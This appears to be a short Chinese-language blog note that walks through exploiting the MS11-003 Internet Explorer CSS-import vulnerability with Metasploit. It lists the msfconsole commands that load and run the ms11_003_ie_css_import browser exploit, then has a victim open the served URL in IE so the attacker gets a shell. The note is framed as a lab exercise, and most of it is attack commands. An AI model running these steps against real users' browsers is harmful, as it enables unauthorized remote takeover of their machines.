57uv6Z6g55qE5Y2a5a6i

MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究，请勿非法破坏，请遵守相关法律法规，后果自负

【笔记】MS11-003漏洞利用

发表于 2024-11-28 更新于 2025-12-26 阅读次数：

前言

利用MS11-003漏洞实现IE浏览器访问网页时得到Shell权限

攻击者开放Web服务

msfconsole
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(windows/browser/ms11_003_ie_css_import) > show options
msf exploit(windows/browser/ms11_003_ie_css_import) > run

1	Using URL: http://<ip>:<port>/xxxxxxxx

受害者访问Web服务

通过IE浏览器访问http://<ip>:<port>/xxxxxxxx

完成

0%